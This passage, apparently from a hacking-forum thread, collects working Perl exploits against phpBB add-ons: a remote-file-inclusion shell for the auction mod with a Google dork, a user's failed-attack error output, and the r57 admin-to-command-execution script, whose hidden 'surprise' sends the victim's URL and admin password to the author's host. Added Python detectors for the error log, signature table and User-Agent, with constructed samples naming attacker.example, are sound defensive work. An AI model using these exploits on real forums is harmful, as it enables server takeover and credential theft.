      print $socket "Content-Length: $length\r\n\r\n";
      print $socket $data;
      read  $socket, $answer, 15;
      close($socket);
   }
   # a 302 would mean the random password actually logged in; stop then
   if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
   $i++;
   print "$answer\n";
   print "Send Packet $i ....\n";
}}
 
phpbb-auction remote file inclusion
Google dork: "Powered by phpBB" inurl:auction.php

Example/exploit:
Code:
/[path]/auction/auction_common.php?phpbb_root_path=http://evil
 
Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
And here is the exploit...
Code:
#!/usr/bin/perl
##
#phpBB auction mod - Remote File Inclusion Vuln
# Bug discovered by VietMafia
# code copier: webDEViL w3bd3vil[at]gmail.com
#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
# dork: intext:"phpbb - auction" inurl:"auction"
# usage:
# perl wb1.pl <target> <cmd shell location> <cmd shell variable>
# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;
use URI::Escape;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
      print "[shell] \$";
      while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);

              $xpl = LWP::UserAgent->new() or die;
              # auction_common.php appends its own file names to phpbb_root_path
              # ("extension.inc", "common.php", ...), so the shell URL ends with a
              # dummy "&z=" that swallows the appended name and keeps $cmd intact;
              # the whole value is escaped so its '?' and '&' are not taken as
              # parameters of the vulnerable page itself
              $root = $Pathtocmd.'?'.$cmdv.'='.uri_escape($cmd).'&z=';
              $req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.uri_escape($root))or die "\nCould Not connect\n";

              $res = $xpl->request($req);
              $return = $res->content;
              $return =~ tr/[\n]/[ê]/;

              if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
              elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
                    {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
              elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

              if($return =~ /(.*)/)
              {
                    $finreturn = $1;
                    $finreturn=~ tr/[ê]/[\n]/;
                    print "\r\n$finreturn\n\r";
                    last;
              }
              else {print "[shell] \$";}
      }
}

sub head()
 {
 print "\n============================================================================\r\n";
 print "  phpBB auction mod - Remote File Inclusion Vuln\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
 print "============================================================================\r\n";
 exit();
 }
 
Something's not working...
Folks, if anyone knows what my mistake is:
I enter
http://www.*****.com/auction/auction_commo...t.txt&cmd=ls&z=
or
http://www.*****.com/auction/auction_commo...vilt.txt&cmd=ls

It outputs:
Warning: main(http://mysite.com/evilt.txtextension.inc): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 26

Warning: main(): Failed opening 'http://mysite.com/evilt.txtextension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 26

Warning: main(http://mysite.com/evilt.txtcommon.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 27

Warning: main(): Failed opening 'http://mysite.com/evilt.txtcommon.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 27

Warning: main(http://mysite.com/evilt.txtauction/functions_blocks.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 28

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_blocks.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 28

Warning: main(http://mysite.com/evilt.txtauction/functions_general.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 29

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_general.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 29

Warning: main(http://mysite.com/evilt.txtauction/functions_validate.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 30

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_validate.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 30

Warning: main(http://mysite.com/evilt.txtauction/auction_constants.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 31

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/auction_constants.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 31

Warning: main(http://mysite.com/evilt.txtincludes/functions_post.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 32

Warning: main(): Failed opening 'http://mysite.com/evilt.txtincludes/functions_post.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 32

Warning: main(http://mysite.com/evilt.txtlanguage/lang_english/lang_auction.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 40

Warning: main(): Failed opening 'http://mysite.com/evilt.txtlanguage/lang_english/lang_auction.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 40

Warning: main(http://mysite.com/evilt.txtlanguage/lang_english/lang_main.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 41

Warning: main(): Failed opening 'http://mysite.com/evilt.txtlanguage/lang_english/lang_main.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 41

Fatal error: Call to undefined function: init_auction_config() in /home/*****/public_html/auction/auction_common.php on line 45

http://www.*****.com/auction/auction_commo...t.txt&cmd=ls&z=


Where did I slip up?
 
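The warnings quoted above are what PHP logs when an include() path prefix that the script never validated resolves to an external URL: each line names the script and line that built the path, the remote host, and the local file name that was glued onto it. That makes the PHP error log a cheap place to catch remote-file-inclusion attempts against add-ons like the auction mod. The following detector is an added example for this thread, not code from the thread, the auction mod or phpBB; it relies only on PHP's standard include() warning wording, and the sample lines are constructed to mirror the quoted output with the host name changed.

```python
"""Flag remote-file-inclusion attempts recorded in a PHP error log.

Added example for this thread (not code from the thread, the auction mod or phpBB).
It relies only on PHP's standard include() warning wording, which the output quoted
above shows; the log lines below are constructed to mirror that output with the
host name changed.
"""
import re
from urllib.parse import urlsplit

# PHP emits two warnings for one failed include(); both carry the target and position.
_OPEN_STREAM = re.compile(
    r"main\((?P<target>.*?)\): failed to open stream: .*? in "
    r"(?P<script>\S+) on line (?P<line>\d+)")
_FAILED_OPEN = re.compile(
    r"Failed opening '(?P<target>.*?)' for inclusion .* in "
    r"(?P<script>\S+) on line (?P<line>\d+)")

# URL-style wrappers that make include() pull code from outside the web root.
_REMOTE_SCHEME = re.compile(
    r"^(?:https?|ftps?|php|data|expect|phar|zip|compress\.zlib)://", re.I)

SAMPLE_LOG = [
    # constructed: same shape as the warnings quoted above, host replaced
    "[01/Mar/2006:12:00:01] PHP Warning:  main(http://attacker.example/evilt.txtextension.inc): "
    "failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in "
    "/home/site/public_html/auction/auction_common.php on line 26",
    "[01/Mar/2006:12:00:01] PHP Warning:  main(): Failed opening "
    "'http://attacker.example/evilt.txtextension.inc' for inclusion "
    "(include_path='.:/usr/lib/php') in /home/site/public_html/auction/auction_common.php on line 26",
    "[01/Mar/2006:12:00:01] PHP Warning:  main(http://attacker.example/evilt.txtcommon.): "
    "failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in "
    "/home/site/public_html/auction/auction_common.php on line 27",
    # constructed: a merely missing local file, which must not be flagged
    "[01/Mar/2006:12:05:44] PHP Warning:  main(./language/lang_klingon/lang_main.php): "
    "failed to open stream: No such file or directory in "
    "/home/site/public_html/common.php on line 12",
]


def parse_include_warning(line):
    """Return (target, script, line_no) for a PHP include warning, else None."""
    for rx in (_OPEN_STREAM, _FAILED_OPEN):
        m = rx.search(line)
        if m:
            return m.group("target"), m.group("script"), int(m.group("line"))
    return None


def scan_php_error_log(lines):
    """One finding per (script, line) whose include target used a URL wrapper.

    A missing local file is ordinary breakage and is left alone. A target that
    starts with http:// etc. means a path variable the script concatenates into
    include() was request-controlled. A fetch that succeeds leaves no warning at
    all, so this must be paired with access-log review, not used instead of it.
    """
    seen = set()
    findings = []
    for raw in lines:
        parsed = parse_include_warning(raw)
        if parsed is None:
            continue
        target, script, line_no = parsed
        if not _REMOTE_SCHEME.match(target):
            continue
        key = (script, line_no)
        if key in seen:
            continue  # second warning of the same failed include
        seen.add(key)
        findings.append({
            "script": script,
            "line": line_no,
            "remote_host": urlsplit(target).netloc,
            "target": target,
        })
    return findings


def hosts_by_script(findings):
    """Group remote hosts per affected script, the unit an admin needs to patch."""
    out = {}
    for f in findings:
        out.setdefault(f["script"], set()).add(f["remote_host"])
    return out


if __name__ == "__main__":
    for f in scan_php_error_log(SAMPLE_LOG):
        print(f"RFI attempt: {f['script']}:{f['line']} pulled from "
              f"{f['remote_host']} ({f['target']})")
```

The dedupe on (script, line) matters because PHP writes two warnings per failed include, as the quoted output shows, so a naive count doubles the incident count. On the hardening side, with allow_url_fopen disabled (and allow_url_include as well on PHP 5.2 and later) include() refuses URL wrappers outright, which removes the remote fetch whether or not the mod is ever patched.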
phpBB admin 2 Remote Execution Exploit
For the collection :)
Code:
#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit
## --------------------------------------------
## *** surprise included;)
## 20/02/06
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;
$login    = $opt_L;
$password = $opt_P;
$id       = $opt_i || 2;
$prefix   = $opt_p || 'phpbb_';
$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
# $ids carries the target URL and the admin login and password. It is sent as the
# User-Agent of every request (so the target's own access log records the credentials),
# and the get() further down ships it to the script author's host: &about returns
# 'http://rst.void.ru'. This is the "surprise included" mentioned in the header.
 $res = $xpl->post($url.'login.php',
 [
 "username"   => "$login",
 "password"   => "$password",
 "autologin"  => "on",
 "admin"      => "1",
 "login"      => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
 # chr() spells out 'ids'/'ids.php'; this requests http://rst.void.ru/ids/ids.php?ids=<credentials>
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
 while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub run($)
 {   
 $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
 @result = split(/\n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
  {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; }
  }
 if($start&&$end) { print $data."\r\n"; }
 }
 
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content      => [
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [
                                   undef,
                                   '0wneeeeedddd',
                                   Content_type => 'text/plain',
                                   Content => "$_[1]",
                                 ],
                ]
,"User-Agent" => "$ids");
}

sub usage()
 {
 &about();
 print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
 print " Options:\r\n";
 print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
 print " -L [login] - admin login\r\n";
 print " -P [password] - admin password\r\n";
 print " -i [id] - admin id (optional, default 2)\r\n";
 print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
 print " -o [host:port] - proxy (optional)\r\n";
 exit();
 }
 
sub about()
  {
  print "\\=-----------------------------------=/\r\n";
  print "| phpBB admin2exec exploit by RST/GHC |\r\n";
  print "| version 2 (user_sig_bbcode_uid)     |\r\n";
  print "/=-----------------------------------=\\\r\n";
  return 'http://rst.void.ru';
  }
 
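Two things in the script above are worth checking for on the defending side. The UPDATE in run() writes a regex fragment with the /e modifier (and a NUL byte) into user_sig_bbcode_uid, so that phpBB's preg_replace() over the signature evaluates the signature as PHP; a stored uid containing regex metacharacters or a NUL can therefore never have been written by the forum itself. And every request the script sends carries the fixed User-Agent prefix from $ids, which means the target's access log records both the attack and the admin credentials it used. The audit below is an added example, not code from the thread or from phpBB. It assumes a legitimate uid is the 10-character [a-z0-9] token produced by phpBB 2's make_bbcode_uid(); the table rows and log lines are constructed.

```python
"""Audit phpBB 2 profile rows and access logs for the tampering the r57 script performs.

Added example, not part of the thread or of phpBB. Assumptions: a legitimate
bbcode uid is the 10-character [a-z0-9] token phpBB 2's make_bbcode_uid() produces
(assumed format), and every row and log line below is constructed.
"""
import re

# Assumed legitimate uid shape (see module docstring); '' means "no signature".
LEGIT_UID = re.compile(r"^[a-z0-9]{10}$")

# Fixed User-Agent prefix taken from the $ids string in the script above.
R57_UA_MARKER = "IDS:r57 phpBB2 exploit"

SAMPLE_ROWS = [
    # (user_id, user_sig_bbcode_uid, user_sig), all constructed
    (2, "(.+)/e\0", "blah:`echo _START_ && id && echo _END_`"),  # mirrors the script's UPDATE
    (3, "3f2a9c0b1d", "[b:3f2a9c0b1d]hello[/b:3f2a9c0b1d]"),     # ordinary signature
    (4, "", ""),                                                  # no signature at all
]

SAMPLE_ACCESS_LOG = [
    # constructed combined-format lines; the first shows the exploit's User-Agent
    '203.0.113.5 - - [20/Feb/2006:10:11:12 +0300] "POST /forum/login.php HTTP/1.1" 302 0 "-" '
    '"IDS:r57 phpBB2 exploit a2e220022006|http://forum.example/|admin|hunter2|2|phpbb_"',
    '198.51.100.9 - - [20/Feb/2006:10:11:30 +0300] "GET /forum/index.php HTTP/1.1" 200 4821 "-" '
    '"Mozilla/5.0"',
]


def uid_problems(uid):
    """Describe why a stored bbcode uid cannot be one phpBB generated ([] if it can)."""
    if uid == "":
        return []
    problems = []
    if "\0" in uid:
        problems.append("NUL byte (truncates the pattern PHP builds around the uid)")
    if "/e" in uid:
        problems.append("'/e' modifier (preg_replace evaluates the replacement as PHP)")
    if re.search(r"[.*+?()\[\]{}|\\^$]", uid):
        problems.append("regex metacharacters")
    if not LEGIT_UID.match(uid):
        problems.append("does not match the 10-char [a-z0-9] format")
    return problems


def audit_signature_rows(rows):
    """rows: iterable of (user_id, user_sig_bbcode_uid, user_sig). Return findings."""
    findings = []
    for user_id, uid, sig in rows:
        problems = uid_problems(uid or "")
        if problems:
            findings.append({
                "user_id": user_id,
                "uid": uid,
                "problems": problems,
                "sig_preview": (sig or "")[:60],  # the payload lives in the signature
            })
    return findings


def find_r57_requests(access_log_lines):
    """Return client IPs of requests carrying the exploit's User-Agent marker."""
    return [line.split(" ", 1)[0] for line in access_log_lines if R57_UA_MARKER in line]


if __name__ == "__main__":
    for f in audit_signature_rows(SAMPLE_ROWS):
        print(f"user {f['user_id']}: uid {f['uid']!r} -> {', '.join(f['problems'])}")
        print(f"  signature: {f['sig_preview']!r}")
    for ip in find_r57_requests(SAMPLE_ACCESS_LOG):
        print(f"r57 exploit User-Agent seen from {ip}")
```

A flagged row is not only evidence: as long as it stays in the table, every render of that user's profile or posts re-executes the signature, so resetting user_sig_bbcode_uid and user_sig for the affected user is part of the cleanup. The access-log hit also tells you which admin password to rotate, since the script put it in the User-Agent in the clear.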

